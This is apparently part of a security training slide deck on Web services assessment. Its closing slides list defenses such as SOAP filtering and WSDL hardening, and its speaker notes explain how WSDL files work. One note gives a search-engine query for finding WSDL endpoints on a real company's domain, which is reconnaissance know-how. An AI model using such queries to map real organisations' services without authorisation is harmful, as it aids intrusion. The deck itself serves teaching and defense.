  • 64. IIS Web Server HTTP Stack .Net Web Services IIS Web Server web2wall (Filter) Web Services Client SOAP Envelope Reject Rules for SOAP Defense 1: SOAP filtering
  • 65. Defense 2: WSDL hardening • WSDL is major source of information • Should not have any leakage • Only provide necessary methods • Invokes over SSL only • WSDL hardening thoroughly
  • 66. Defense 3: Authentication & Authorization • WSDL access control • Use of SAML • Credentials – WS-Security • Certificate analysis • SOAP and XML filtering before access
  • 67. Defense 4: Secure Coding • Fault code management and Exception control • Input validation • SQL integration • Levels of coding using different components
  • 68. Defense 5: XML parsing • Good XML parsing should be used • .Net/J2EE – may have issues with XML parsing • Buffer overflows using schema poisoning
  • 69. © Blueinfy Solutions Pvt. Ltd. Conclusion

Editor's Notes

  1. The objective of this section is to use a Web services assessment methodology that is used in the field.
  2. Search engines maintain a cache of all links collected from web sites. Search engines use their own crawling software to fetch links on Web services. Try this: To find web services running on the “amazon” domain, type: inurl:wsdl site:amazon.com
  3. Objective: gather all possible information about Web services
  4. One of the major sources of information: WSDL file
  5. The objective of this step is to scan Web services and gather initial attack points. Web services are running with different resources. Each of these resources is linked together and a scanning exercise helps in collecting these resources. A WSDL file is a very important resource for Web services, and its scanning is therefore a very important exercise. WSDL is an XML document that serves two purposes: Defines how to access Web services Furnishes information about where to access these Web services In a nutshell, Web services specifies the location and operations of Web services. Any Web service client can fetch information from the WSDL and build specific requests.
  6. WSDL has 4 main components (XML): Type element: used when defined data types are complex types. binding element: contains information about accessing Web services. Has two attributes within the tag name: any name and port binding. &amp;lt;binding&amp;gt; links to &amp;lt;portType&amp;gt; soap:binding element provides style and transport attribute information. e.g. http://schemas.xmlsoap.org/soap/http (reflects SOAP protocol over HTTP) style can be either rpc or document. soap:operation element is a mandatory attribute for certain operations. HTTP requests must be sent over a network using soapAction in the HTTP header. (Otherwise Web services would not respond.)
  7. Service name: dvds4less Binding address: http://192.168.11.2/ws/dvds4less.asmx This information provides the location and its access position. All calls and Web-based API invoked will be handled at this location.
  8. portType element: comparable to a class or module in C++ or Java. a class or module contains a set of methods that can be accessed. These methods are specified in the &amp;lt;operation&amp;gt; element. Operations and methods are actual entry points to Web services. portType presents the type of invoke supported. (SOAP) Sometimes, GET and POST are also supported. Operation represents the method name
  9. message element: contains information about the name and type of parameter.